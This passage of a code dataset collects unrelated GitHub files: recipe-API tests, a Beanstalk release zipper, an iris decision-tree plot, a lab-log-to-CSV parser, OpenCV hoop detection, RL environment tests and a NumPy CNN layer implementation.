text","repo_name":"Eolas-bith/Eolas-public","sub_path":"url_list_text_to_corpus.py","file_name":"url_list_text_to_corpus.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"22746046811","text":"import json\n\nimport pytest\n\nfrom app.core.config import settings\n\nSOURCE = dict(name=\"Source\", url=\"http://source.com\")\nRECIPE = dict(\n name=\"Recipe\",\n url=\"http://recipe.com\",\n image=\"http://image.com\",\n ingredients=\"garlic tomato\",\n)\nSOURCE_ID: int = None\nRECIPE_ID: int = None\n\n\nclass TestRecipe:\n def test_create_source(self, client):\n global SOURCE_ID\n resp = client.post(f\"{settings.api.version}/sources/\", data=json.dumps(SOURCE))\n assert resp.status_code == 201\n SOURCE_ID = resp.json()[\"id\"]\n SOURCE.update({\"id\": SOURCE_ID, \"url\": \"source.com\"})\n assert resp.json() == SOURCE\n\n def test_add_recipe(self, client):\n global RECIPE_ID\n data = json.dumps(RECIPE)\n resp = client.post(\n f\"{settings.api.version}/sources/{SOURCE_ID}/recipes/\", data=data\n )\n if resp.status_code in (404, 422):\n pytest.skip(\"Source cannot be found.\")\n assert resp.status_code == 201\n RECIPE_ID = resp.json()[\"id\"]\n ingredients = resp.json()[\"ingredients\"]\n RECIPE.update({\"id\": RECIPE_ID, \"ingredients\": ingredients})\n assert resp.json() == RECIPE\n\n def test_get_recipe(self, client):\n resp = client.get(\n f\"{settings.api.version}/sources/{SOURCE_ID}/recipes/{RECIPE_ID}/\"\n )\n if resp.status_code in (404, 422):\n pytest.skip(\"Source cannot be found.\")\n assert resp.status_code == 200\n assert resp.json() == RECIPE\n\n def test_get_recipes(self, client):\n resp = client.get(f\"{settings.api.version}/sources/{SOURCE_ID}/recipes/\")\n if resp.status_code in (404, 422):\n pytest.skip(\"Source cannot be found.\")\n assert resp.status_code == 200\n\n def test_update_recipe(self, client):\n RECIPE[\"name\"] = \"Recipe 2.0\"\n data = json.dumps(dict(name=\"Recipe 2.0\"))\n resp = client.put(\n f\"{settings.api.version}/sources/{SOURCE_ID}/recipes/{RECIPE_ID}/\",\n data=data,\n )\n if resp.status_code in (404, 422):\n pytest.skip(\"Source cannot be found.\")\n assert resp.status_code == 200\n assert resp.json() == RECIPE\n\n def test_remove_recipe(self, client):\n resp = client.delete(\n f\"{settings.api.version}/sources/{SOURCE_ID}/recipes/{RECIPE_ID}/\"\n )\n if resp.status_code in (404, 422):\n pytest.skip(\"Source cannot be found.\")\n assert resp.status_code == 200\n assert resp.json() == RECIPE\n\n def test_remove_source(self, client):\n resp = client.delete(f\"{settings.api.version}/sources/{SOURCE_ID}/\")\n assert resp.status_code == 200\n assert resp.json() == SOURCE\n","repo_name":"AlexNilsson/mychef","sub_path":"backend/api/tests/api/test_recipes.py","file_name":"test_recipes.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"5"} +{"seq_id":"24265213459","text":"import os, zipfile\n\nignorar_diretorios = [\"node_modules\", \"release\"]\nignorar_arquivos = [\"release.py\", \".env\"]\n\ndeploy_ssl = False\n\nif not deploy_ssl:\n ignorar_diretorios.append(\".platform\")\n ignorar_arquivos.append(\"03_ssl.config\")\n\nprint(\"\\nIniciando empacotamente de release para o Beanstalk\\n\")\n\ndiretorio_raiz = os.path.relpath(os.getcwd())\nprint(\"Diretório raiz:\", diretorio_raiz + \"\\n\")\n\ndiretorio_final = diretorio_raiz + \"/release/\"\nprint(\"Diretorio final:\", 
\r\n\r\nzf = zipfile.ZipFile(\"./release/api_release.zip\", \"w\")\r\nfor dirname, subdirs, files in os.walk(diretorio_raiz):\r\n\r\n    ignorar = False\r\n\r\n    for i in ignorar_diretorios:\r\n        if i in dirname:\r\n            ignorar = True\r\n\r\n    if not ignorar:\r\n        if dirname != \".\":\r\n            print(\"Packaging:\", dirname)\r\n            zf.write(dirname)\r\n        for filename in files:\r\n            if filename not in ignorar_arquivos:\r\n                zf.write(os.path.join(dirname, filename), \r\n                    os.path.relpath(os.path.join(dirname, filename)))\r\nzf.close()\r\n\r\nprint(\"\\nRelease packaging finished\\n\")","repo_name":"atomo-binx/binx-backend","sub_path":"backend/release.py","file_name":"release.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21375916738","text":"\"\"\"\n================================================================\nPlot the decision surface of a decision tree on the iris dataset\n================================================================\n\nPlot the decision surface of a decision tree trained on pairs\nof features of the iris dataset.\n\nSee :ref:`decision tree ` for more information on the estimator.\n\nFor each pair of iris features, the decision tree learns decision\nboundaries made of combinations of simple thresholding rules inferred from\nthe training samples.\n\nThis code was adapted from the example provided by scikit-learn, available at\nhttp://scikit-learn.org/stable/auto_examples/tree/plot_iris.html#example-tree-plot-iris-py\n\"\"\"\nprint(__doc__)\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn.datasets import load_iris\nfrom sklearn.tree import DecisionTreeClassifier\n\n# Parameters\nn_classes = 3\nplot_colors = \"bry\"\nplot_step = 0.02\n\n# Load data\niris = load_iris()\n\nfor pairidx, pair in enumerate([[0, 1], [0, 2], [0, 3],\n                                [1, 2], [1, 3], [2, 3]]):\n    # We only take the two corresponding features\n    X = iris.data[:, pair] \n    y = iris.target\n\n    # Shuffle\n    # .shape returns the dimensions of the array\n    # arange (start,stop,step) creates a 1-D vector\n    idx = np.arange(X.shape[0]) # returns an array from 0 to X.shape[0], or 150\n    np.random.seed(13) # Seed the randomization \n    np.random.shuffle(idx) # Shuffle in place based on the seeded randomization\n    \n    X = X[idx] # re-sort X randomly based on IDX as indices\n    y = y[idx]\n\n    # Standardize\n    mean = X.mean(axis=0) # Take the mean over the first axis (long axis)\n    std = X.std(axis=0)\n    X = (X - mean) / std # Normalize to a 'normal distribution'\n\n    # Train\n    clf = DecisionTreeClassifier().fit(X, y)\n\n    # Plot the decision boundary\n    plt.subplot(2, 3, pairidx + 1)\n\n    x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1\n    y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1\n\n    # Meshgrid creates coordinate grid from vectors of coordinates\n    xx, yy = np.meshgrid(np.arange(x_min, x_max, plot_step),\n                         np.arange(y_min, y_max, plot_step))\n\n    # Ravel creates a 1-D view of the vector\n    # c_ concatenates 1D vectors into columns of a 2D array, basically\n    # making xx.ravel() column 0, yy.ravel() column 1\n    Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])\n    Z = Z.reshape(xx.shape)\n    cs = plt.contourf(xx, yy, Z, cmap=plt.cm.Paired)\n\n    plt.xlabel(iris.feature_names[pair[0]])\n    plt.ylabel(iris.feature_names[pair[1]])\n    plt.axis(\"tight\")\n\n    # Plot the training points\n    for i, color in zip(range(n_classes), plot_colors):\n        idx = np.where(y == i)\n        plt.scatter(X[idx, 0], X[idx, 1], c=color, label=iris.target_names[i],\n            
cmap=plt.cm.Paired)\n\n plt.axis(\"tight\")\n\nplt.suptitle(\"Decision surface of a decision tree using paired features\")\nplt.legend()\nplt.show()\n","repo_name":"doankhue-nh/Assignment_HW1_142076","sub_path":"hw1_skeleton/example_dt_iris.py","file_name":"example_dt_iris.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"22746044121","text":"import json\n\nimport pytest\n\nfrom app.core.config import settings\n\n\nclass TestIngredientInvalid:\n @pytest.mark.parametrize(\n \"payload, code\",\n [\n (dict(ingredient=[\"tomato\"]), 422),\n (dict(ingredient={\"name\": \"tomato\"}), 422),\n ],\n )\n def test_add_ingredient_invalid(self, client, payload, code):\n data = json.dumps(payload)\n resp = client.post(f\"{settings.api.version}/ingredients/\", data=data)\n assert resp.status_code == code\n\n def test_get_ingredient_invalid(self, client):\n resp = client.get(f\"{settings.api.version}/ingredients/0/\")\n assert resp.status_code == 404\n\n def test_get_ingredients_invalid(self, client):\n resp = client.get(f\"{settings.api.version}/ingredient/\")\n assert resp.status_code == 404\n\n def test_update_ingredient_invalid(self, client):\n resp = client.put(\n f\"{settings.api.version}/ingredients/0/\", data=json.dumps(dict())\n )\n assert resp.status_code == 404\n\n def test_remove_ingredient_invalid(self, client):\n resp = client.delete(f\"{settings.api.version}/ingredients/0/\")\n assert resp.status_code == 404\n","repo_name":"AlexNilsson/mychef","sub_path":"backend/api/tests/api/test_ingredients_invalid.py","file_name":"test_ingredients_invalid.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"5"} +{"seq_id":"16656357381","text":"import json\r\nimport csv\r\nimport re\r\nimport os\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n#getting the path of all the jsons in the directory\r\nfiles = []\r\nd = \"F:/Nirrogyan/AWS/aws logs/\"\r\nfor path in os.listdir(d):\r\n full_path = os.path.join(d, path)\r\n files.append(full_path)\r\n\r\n#extracting the dataset of the person who has taken the most number of tests (results from another script) to make a list of all the test available\r\ntests = []\r\nfor m in range(0, len(files)):\r\n with open(files[m]) as f:\r\n for line in f:\r\n final_data = []\r\n x = re.search(\"{\\\"header\\\"\", line)\r\n if x != None:\r\n data = (line[(x.span()[0]):])\r\n s = json.loads(data)\r\n\r\n if (s['header']['personInfo']['name']) == 'Murtaza Beawerwala':\r\n for i in range (0, len(s['values'])):\r\n tests.append(s['values'][i]['param'])\r\n break\r\ntests = np.unique(tests)\r\n\r\n# extracting from each file\r\nfor m in range(0, len(files)):\r\n with open(files[m]) as f:\r\n for line in f:\r\n final_data = []\r\n x = re.search(\"{\\\"header\\\"\", line)\r\n if x != None:\r\n data = (line[(x.span()[0]):])\r\n s = json.loads(data)\r\n\r\n tests_data = {}\r\n\r\n patient_id = s['header']['personInfo']['name'].lower().replace(' ', '_')\r\n name = s['header']['personInfo']['name']\r\n age = int(s['header']['personInfo']['age'])\r\n gender = s['header']['personInfo']['gender']\r\n date = s['header']['date']\r\n order_id = int(s['values'][0]['order_id'])\r\n \r\n if gender == 'male':\r\n tests_data.update(patient_id = 'm_{}_{}'.format(age, patient_id))\r\n else:\r\n tests_data.update(patient_id = 'f_{}_{}'.format(age, patient_id))\r\n \r\n tests_data.update(name = name)\r\n 
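# copy the remaining header fields into the flat row, one column per field\r\n            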
tests_data.update(age = age)\r\n tests_data.update(gender = gender)\r\n tests_data.update(date = date)\r\n tests_data.update(order_id = order_id)\r\n \r\n for j in range(0, len(tests)):\r\n for i in range(0, len(s['values'])):\r\n if tests[j] == s['values'][i]['param']:\r\n \r\n try:\r\n try:\r\n tests_data.update({'test{}'.format(j): float(s['values'][i]['value'])})\r\n except ValueError:\r\n tests_data.update({'test{}'.format(j):s['values'][i]['value']})\r\n except KeyError:\r\n tests_data.update({'test{}'.format(j): '-'})\r\n break\r\n #checking for the tests not taken by the patient \r\n if i == (len(s['values']) - 1) and (tests[j] != s['values'][i]['param']):\r\n tests_data.update({'test{}'.format(j): '{} : N/A'.format(tests[j])})\r\n \r\n final_data.append(tests_data)\r\n #All the data has been stored in the dict.\r\n\r\n #Putting all the data in a csv\r\n data_file = open('testing.csv', 'a')\r\n csv_writer = csv.writer(data_file)\r\n count = 0\r\n\r\n for j in final_data:\r\n csv_writer.writerow(j.values())\r\n data_file.close()\r\n\r\n else:\r\n continue","repo_name":"Ishanbhatia98/Niroggyan","sub_path":"Get_active_data_analysis/notebooks/datascript.py","file_name":"datascript.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37958682672","text":"\"\"\"\nimage_filtering\nAuthor: Neil Balaskandarajah\nCreated on: 24/06/2020\nImage of game in -> model of game out\n\"\"\"\nfrom model.game import Game\nimport cv2\nimport numpy as np\n\n# (Hue, Hue Tolerance, Close Size, V Min)\nCOLORS = {\n 'gren': (63, 5, 1, 240),\n 'red ': (176, 3, 3, 250),\n 'cyan': (95, 5, 3, 255),\n 'blue': (109, 3, 1, 240),\n 'purp': (144, 3, 1, 206),\n 'pink': (153, 4, 1, 253),\n 'orng': (25, 5, 1, 0)\n}\n\nLOWER_BG = (0,0,250)\nUPPER_BG = (255, 255, 255)\n\ndef draw_rect(image, rect, clr):\n \"\"\"Draw a rectangle onto an image\n\n @param image: Image to draw onto\n @param rect: Rectangle object in (top_left_x, top_left_y, width, height) format\n @param clr: Color of the rectangle in BGR format\n @return: Image with the rectangle drawn over\n \"\"\"\n x,y,w,h = rect\n return cv2.rectangle(image, (x,y), (x+w,y+h), clr, 2)\n\ndef scale_image(image, s):\n \"\"\"Scale an image up by a factor s\n\n @param image: Image to scale\n @param s: Scale factor\n @return: Scaled image\n \"\"\"\n w = int(image.shape[1] * s)\n h = int(image.shape[0] * s)\n return cv2.resize(image, (w, h))\n\n#--------------Functions--------------#\n\ndef filter_bg(image, lower=LOWER_BG, upper=UPPER_BG, e=5):\n \"\"\"Filter the background out for an image given lower and upper bounds\n Convert to HSV -> threshold in range -> morphologically close\n\n @param image: Image to filter\n @param lower: Lower bound (h, s, v)\n @param upper: Upper bound (h, s, v)\n @param e: Erosion size (integer)\n @return: Image with the background filtered out\n \"\"\"\n image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n image = cv2.inRange(image, np.array(lower), np.array(upper))\n image = cv2.morphologyEx(image, cv2.MORPH_CLOSE, np.ones((e, e), np.uint8))\n\n return image\n\ndef get_stack_bounds(image):\n \"\"\"Get the bounds of the stacks from the image\n\n @param image: Image to find the stacks within\n @return: List of bounding rects in the image\n \"\"\"\n # Backgroundless\n no_bg = filter_bg(image)\n\n # Get the bounding box for each stack\n contours, _ = cv2.findContours(no_bg, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n # no_bg = cv2.drawContours(no_bg, 
contours, -1, (255, 0, 0))\n cv2.imshow('no bg', no_bg)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n return [cv2.boundingRect(c) for c in contours if cv2.contourArea(c) > 5] #remove erroneous small contours\n\ndef get_click_locations(stack_bounds):\n \"\"\"Get the coordinates of the clicking location for each boundingRect\n\n @param stack_bounds: boundingRects\n @return: The centers of each stack bound\n \"\"\"\n STACK_LABELS = 'ABCDEFGHIJ'\n\n stacks = dict()\n for i, rect in enumerate(stack_bounds):\n x,y,w,h = rect\n stacks[STACK_LABELS[i]] = (x+w//2, y+h//2)\n\n return stacks\n\ndef get_stack_images(image, bounds=None):\n \"\"\"Return the subimage of each stack in the image\n\n @param image: Image to pull stack images from\n @param bounds: The bounds of each stack\n @return: The image for each stack\n \"\"\"\n if bounds is None:\n bounds = get_stack_bounds(image)\n return [image[y:y + h, x:x + w] for x, y, w, h in bounds]\n\ndef game_from_image(img):\n \"\"\"Create a Game object that the backtracking algorithm can solve from an image\n\n @param img: Snapshot of all stacks\n @return: Game object (list of stacks)\n \"\"\"\n # Get the bounding box of each stack\n stack_bounds = get_stack_bounds(img)\n\n # Get the click locations for each stack\n clicks = get_click_locations(stack_bounds)\n\n # Get the image for each stack\n stack_imgs = get_stack_images(img, stack_bounds)\n\n # Create the Game object and the stacks to it\n # TO-DO: Move this to the Game object\n stacks = [get_game_stack(stack_img) for stack_img in stack_imgs]\n num_pieces = calc_num_pieces(stacks)\n game = Game(num_pieces)\n game.add_stacks(stacks)\n\n return game, clicks\n\ndef calc_num_pieces(stacks):\n # TO-DO: Move this to game\n \"\"\"Calculate the number of pieces in all of the stacks\n\n @param stacks: List of stacks\n @return: Number of pieces in a single stack\n \"\"\"\n #Choose a color\n color = None\n for stack in stacks:\n if len(stack) > 0:\n color = stack[0]\n\n #Max number of pieces is how many of any color is in all the stacks\n num_pieces = 0\n for stack in stacks:\n for piece in stack:\n if piece == color:\n num_pieces += 1\n return num_pieces\n\ndef get_game_stack(stack_img):\n \"\"\"Create a stack that can be added to a Game object from an image of the stack\n\n @param stack_img: Image of a single stack\n @return: List of hoops (each hoop is represented by a color)\n \"\"\"\n img = stack_img\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\n stack = []\n for color in COLORS:\n contours = thresh_color(img, hsv, COLORS[color])\n for contour in contours:\n stack.append((color, cv2.boundingRect(contour)[1])) #Color name, y value\n\n stack = sorted(stack, key=lambda x: x[1]) #Sort by y value\n return [hoop[0] for hoop in stack] #Return just the names\n\ndef thresh_color(img, img_hsv, clr):\n \"\"\"Return the vertical positions of the contours of the color clr\n\n @param img: Image to filter\n @param img_hsv: The hsv version of the image\n @param clr: Color to filter in (Hue, Hue Tolerance, Close Size, V Min) format\n @return: Vertical positions of all contours of the color clr\n \"\"\"\n lowerb = (clr[0] - clr[1], 0, clr[3])\n upperb = (clr[0] + clr[1], 255, 255)\n\n mask = cv2.inRange(img_hsv, lowerb, upperb)\n img = cv2.bitwise_and(img, img, mask=mask)\n\n # Open up the image to remove spots inside\n img = cv2.morphologyEx(img, cv2.MORPH_OPEN, np.ones((clr[2], clr[2]), np.uint8))\n\n # Find contours\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n cont_mask = cv2.inRange(hsv, lowerb, upperb)\n contours, _ = 
cv2.findContours(cont_mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n    # Filter out bad contours\n    contours = filter_out_contours(contours)\n\n    return contours\n\ndef filter_out_contours(contours):\n    \"\"\"Filter out bad contours that are not hoops\n\n    @param contours: List of contours\n    @return: Contours that are/contain hoops\n    \"\"\"\n    i = 0\n    while i < len(contours):\n        area = -cv2.contourArea(contours[i], True)\n\n        if abs(area) < 180: # Small area\n            contours.pop(i)\n            continue\n\n        if area < 0: # Black contour\n            contours.pop(i)\n            continue\n        i += 1\n    return contours\n\ndef is_black(img):\n    \"\"\"Return whether an image is all black or not\n\n    @param img: Image to check\n    @return: True if the image is all black, false if not\n    \"\"\"\n    return cv2.countNonZero(cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)) == 0\n","repo_name":"NeilRajah/HoopStackAI","sub_path":"cv/image_filtering.py","file_name":"image_filtering.py","file_ext":"py","file_size_in_byte":6810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72624047192","text":"import sys\nsys.stdin = open('input.txt')\n\nT = int(input())\nfor tc in range(1, T+1):\n    x = input()\n    y = input()\n    while len(x) <= len(y):\n        if x in y:\n            print('#{} 1'.format(tc))\n            break\n        else:\n            print('#{} 0'.format(tc))\n            break\n# sol2\nT = int(input())\nfor tc in range(1, T+1):\n    s1 = input() # XYPV\n    s2 = input() # EOGGXYPVST\n\n    # create a sliding window the length of s1\n    window = len(s1)\n\n    # slide one position at a time and compare against s1\n    result = 0\n    for i in range(len(s2) - window +1):\n        # if the window matches\n        if s1 == s2[i:i+window]:\n            result = 1\n            break\n    print('#{} {}'.format(tc, result))\n\n","repo_name":"Leeyounwoo/Algorithm","sub_path":"In SSAFY/0817/hee_hannah/4864_compare_string/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"27025387582","text":"# coding=utf-8\r\n\r\nimport os\r\n\r\nttm = 'XD_BAIDUXD_LOAN_RATE'\r\n# template (input) path\r\nfilePath = r\"E:\\tmp\\0731\\%s.sql\"%ttm\r\n\r\n## output path\r\nout_file_path = r\"\\\\USER-20190220BH\\mnt\\%s.sql\"%ttm\r\n\r\n\r\nf = open(filePath, 'r', encoding='utf-8')\r\nlines = f.readlines()\r\n\r\nif os.path.exists(out_file_path):\r\n    os.remove(out_file_path)\r\n\r\nwf = open(out_file_path, 'w', encoding='utf-8')\r\nfor li in lines:\r\n    dd = li.split(',')\r\n    print(dd[0],dd[1],dd[2],dd[3],dd[4],dd[5],dd[6])\r\n    cloName = dd[0].strip()\r\n    cloNo = int(dd[1].strip())+1\r\n    cloType = dd[2].strip()\r\n    cloLength = dd[3].strip()\r\n    cloScle = dd[4].strip()\r\n    cloKey = dd[5].strip()\r\n    cloRmark = dd[6].strip()\r\n    sch_key = 'CORE_%s'%ttm\r\n    if cloKey != '' and cloKey != '0' and cloKey != 'null':\r\n        cloKey = 'XX'\r\n    if cloScle == '0':\r\n        cloScle = ''\r\n    ss = \"INSERT INTO table_field(ord_number, field_code, field_type, field_len, field_accuracy, key_flag, scheme_key)\" \"VALUES('%s','%s','%s','%s','%s','%s','%s');\\r\" %(cloNo,cloName,cloType,cloLength,cloScle,cloKey,sch_key)\r\n    wf.write(ss)\r\nwf.close()\r\n","repo_name":"Wzhenshuai/JNBank","sub_path":"test/reader_table.py","file_name":"reader_table.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37005354739","text":"import numpy as np\nimport pytest\n\nfrom environments import UnityEnv, OpenAiEnv, MpEnv\n\n\n@pytest.fixture\ndef env():\n    env = UnityEnv('Reacher_Linux_NoVis_1/Reacher.x86_64')\n    try:\n        yield env\n    finally:\n        env.close()\n\n\ndef test_banana_env(env):\n    state = env.reset()\n    
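# sanity note: the Reacher observation is a 33-dim vector (env.nS asserted\n    # below) and the action space has 4 dims (env.nA)\n    assert 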
isinstance(state, np.ndarray)\n assert state.shape == (33,)\n\n next_state, reward, done, info = env.step([0., 0., 0., 0.])\n assert isinstance(state, np.ndarray)\n assert next_state.shape == (33,)\n\n assert isinstance(reward, float)\n assert isinstance(done, bool)\n\n assert env.nA == 4\n assert env.nS == 33\n\n\ndef test_cart_pole():\n env = OpenAiEnv('CartPole-v1')\n env.initialize(True)\n state = env.reset()\n assert state.shape == (4,)\n state, rewards, done, info = env.step(0)\n assert state.shape == (4,)\n assert isinstance(rewards, float)\n assert isinstance(done, bool)\n\n\ndef test_mp_env_eval_mode():\n env = MpEnv('CartPole-v1')\n env.initialize(False)\n state = env.reset()\n assert state.shape == (4,)\n state, rewards, done, info = env.step(0)\n assert state.shape == (4,)\n assert isinstance(rewards, float)\n assert isinstance(done, bool)\n\n\ndef test_mp_env_train_mode():\n env = MpEnv('CartPole-v1', n_workers=2)\n try:\n env.initialize(True)\n state = env.reset(rank=0)\n assert state.shape == (4,)\n states = env.reset()\n assert states.shape == (2, 4)\n states, rewards, dones, infos = env.step([0, 0])\n assert states.shape == (2, 4)\n assert rewards.shape == (2, 1)\n assert dones.shape == (2, 1)\n finally:\n env.close()\n","repo_name":"piotrbazan/udacity_drlnd_projects","sub_path":"p2_continuous_control/test_environments.py","file_name":"test_environments.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"16733326537","text":"from abc import abstractmethod\r\nimport numpy as np\r\nfrom handcrafted_nn.tensor import tensor\r\nfrom handcrafted_nn.parameter import parameter\r\nfrom handcrafted_nn.pure_data import pure_data\r\n\r\nclass operation(tensor):\r\n def __init__(self):\r\n super().__init__()\r\n pass\r\n\r\n def __call__(self,x):\r\n # self.input.append(x.input)\r\n # self.input.append(self)\r\n return self.forward(x)\r\n \r\n @abstractmethod\r\n def forward():\r\n ...\r\n\r\n @abstractmethod\r\n def backward():\r\n ...\r\n\r\nclass conv2D(operation):\r\n def __init__(self, filter_size=(3,3),in_channel = 1, out_channel = 1, stride = 1, padding=0):\r\n super().__init__()\r\n self.b = parameter(matrix=np.random.rand(1,1,1, out_channel)/10)\r\n self.W = parameter(matrix=np.random.rand(in_channel,filter_size[0], filter_size[1], out_channel)/10)\r\n self.db = parameter(matrix=np.zeros([1,1,1, out_channel]))\r\n self.dW = parameter(matrix=np.zeros([in_channel,filter_size[0], filter_size[1], out_channel]))\r\n self.stride = stride\r\n self.padding = padding\r\n self.v_w = parameter(matrix=np.zeros([in_channel,filter_size[0], filter_size[1], out_channel]))\r\n self.v_b = parameter(matrix=np.zeros([1,1,1, out_channel]))\r\n\r\n def conv_single_step(self, A, W, b):\r\n s = np.multiply(A, W)\r\n z = np.sum(s)\r\n z = z + b.astype(float)\r\n return z\r\n\r\n def zero_pad(self, X, pad):\r\n X_pad = np.pad(X, ((0,0), (0,0), (pad,pad), (pad,pad)), 'constant', constant_values = (0,0))\r\n return X_pad\r\n \r\n def forward(self, input_A):\r\n self.A = input_A\r\n input_A = input_A.matrix\r\n (batch, n_C_prev, n_H_prev, n_W_prev) = input_A.shape\r\n # Retrieve dimensions from W's shape (≈1 line)\r\n (n_C_prev, f, f, n_C) = self.W.shape\r\n \r\n # Compute the dimensions of the CONV output volume using the formula given above. Hint: use int() to floor. 
(≈2 lines)\r\n n_H = int((n_H_prev + 2*self.padding - f)/self.stride) + 1\r\n n_W =int((n_W_prev + 2*self.padding - f)/self.stride) + 1\r\n \r\n # Initialize the output volume Z with zeros. (≈1 line)\r\n Z = np.zeros([batch,n_C, n_H, n_W])\r\n # Create A_prev_pad by padding A_prev\r\n A_prev_pad = self.zero_pad(input_A, self.padding)\r\n \r\n for i in range(batch): # loop over the batch of training examples\r\n a_prev_pad = A_prev_pad[i,:,:,:] # Select ith training example's padded activation\r\n for h in range(n_H): # loop over vertical axis of the output volume\r\n for w in range(n_W): # loop over horizontal axis of the output volume\r\n for c in range(n_C): # loop over channels (= #filters) of the output volume\r\n \r\n # Find the corners of the current \"slice\" (≈4 lines)\r\n vert_start = h*self.stride\r\n vert_end = h*self.stride + f\r\n horiz_start = w*self.stride \r\n horiz_end = w*self.stride + f\r\n \r\n # Use the corners to define the (3D) slice of a_prev_pad (See Hint above the cell). (≈1 line)\r\n a_slice_prev = a_prev_pad[:,vert_start:vert_end,horiz_start:horiz_end]\r\n \r\n \r\n # Convolve the (3D) slice with the correct filter W and bias b, to get back one output neuron. (≈1 line)\r\n Z[i,c, h, w] = self.conv_single_step(a_slice_prev, self.W.matrix[:, :, :, c], self.b.matrix[:,:,:,c])\r\n \r\n ### END CODE HERE ###\r\n \r\n # Making sure your output shape is correct\r\n assert(Z.shape == (batch, n_C, n_H, n_W))\r\n self.matrix = Z\r\n return parameter(Z)\r\n\r\n def backward(self, up_grad):\r\n # Retrieve dimensions from A_prev's shape\r\n (batch, n_C_prev, n_H_prev, n_W_prev) = self.A.shape\r\n \r\n # Retrieve dimensions from W's shape\r\n (n_C_prev, f, f, n_C) = self.W.shape\r\n \r\n \r\n # Retrieve dimensions from dZ's shape\r\n (batch, n_C, n_H, n_W) = up_grad.shape\r\n \r\n # Initialize dA_prev, dW, db with the correct shapes\r\n dA_prev = np.zeros((batch, n_C_prev, n_H_prev, n_W_prev)) \r\n dW = np.zeros((n_C_prev, f, f, n_C))\r\n db = np.zeros((1, 1, 1, n_C))\r\n\r\n # Pad A_prev and dA_prev\r\n\r\n A_prev_pad = self.zero_pad(self.A.matrix, self.padding)\r\n dA_prev_pad = self.zero_pad(dA_prev, self.padding)\r\n \r\n for i in range(batch): # loop over the training examples\r\n \r\n # select ith training example from A_prev_pad and dA_prev_pad\r\n a_prev_pad = A_prev_pad[i]\r\n da_prev_pad = dA_prev_pad[i]\r\n \r\n for h in range(n_H): # loop over vertical axis of the output volume\r\n for w in range(n_W): # loop over horizontal axis of the output volume\r\n for c in range(n_C): # loop over the channels of the output volume\r\n \r\n # Find the corners of the current \"slice\"\r\n vert_start = h\r\n vert_end = vert_start + f\r\n horiz_start = w\r\n horiz_end = horiz_start + f\r\n \r\n # Use the corners to define the slice from a_prev_pad\r\n a_slice = a_prev_pad[:, vert_start:vert_end, horiz_start:horiz_end]\r\n\r\n # Update gradients for the window and the filter's parameters using the code formulas given above\r\n da_prev_pad[:, vert_start:vert_end, horiz_start:horiz_end] += self.W.matrix[:,:,:,c] * up_grad.matrix[i, c, h, w]\r\n dW[:,:,:,c] += a_slice * up_grad.matrix[i, c, h, w]\r\n db[:,:,:,c] += up_grad.matrix[i, c, h, w]\r\n \r\n # Set the ith training example's dA_prev to the unpaded da_prev_pad (Hint: use X[pad:-pad, pad:-pad, :])\r\n if self.padding == 0:\r\n dA_prev[i, :, :, :] = da_prev_pad\r\n else:\r\n dA_prev[i, :, :, :] = da_prev_pad[:, self.padding:-self.padding, self.padding:-self.padding]\r\n ### END CODE HERE ###\r\n \r\n # Making sure your output 
shape is correct\r\n assert(dA_prev.shape == (batch, n_C_prev, n_H_prev, n_W_prev))\r\n self.dA = parameter(dA_prev)\r\n self.db = self.db + parameter(db)\r\n self.dW = self.dW + parameter(dW)\r\n\r\n return self.dA\r\n\r\n def update(self,lr, beta = 1):\r\n\r\n self.A = self.A - self.dA.multiply_constant(lr)\r\n self.dA = parameter(matrix=np.array([]))\r\n self.b = self.b - self.db.multiply_constant(lr)\r\n self.db = parameter(matrix=np.zeros_like(self.db.matrix))\r\n self.W = self.W - self.dW.multiply_constant(lr)\r\n self.dW = parameter(matrix=np.zeros_like(self.dW.matrix))\r\n return \r\n\r\nclass pooling_2D(operation):\r\n def __init__(self,filter = 2, stride = 2, mode='max'):\r\n super().__init__()\r\n self.mode = mode\r\n self.f = filter\r\n self.stride = stride\r\n\r\n def create_mask_from_window(self,x):\r\n mask = x == np.max(x)\r\n return mask\r\n\r\n def distribute_value(self, dz, shape):\r\n (n_H, n_W) = shape\r\n average = dz / (n_H * n_W)\r\n a = np.ones(shape) * average\r\n \r\n return a\r\n\r\n def forward(self, input_A):\r\n self.A = input_A\r\n (m, n_C_prev, n_H_prev, n_W_prev) = input_A.shape\r\n \r\n # Define the dimensions of the output\r\n n_H = int(1 + (n_H_prev - self.f) / self.stride)\r\n n_W = int(1 + (n_W_prev - self.f) / self.stride)\r\n n_C = n_C_prev\r\n \r\n # Initialize output matrix A\r\n A = 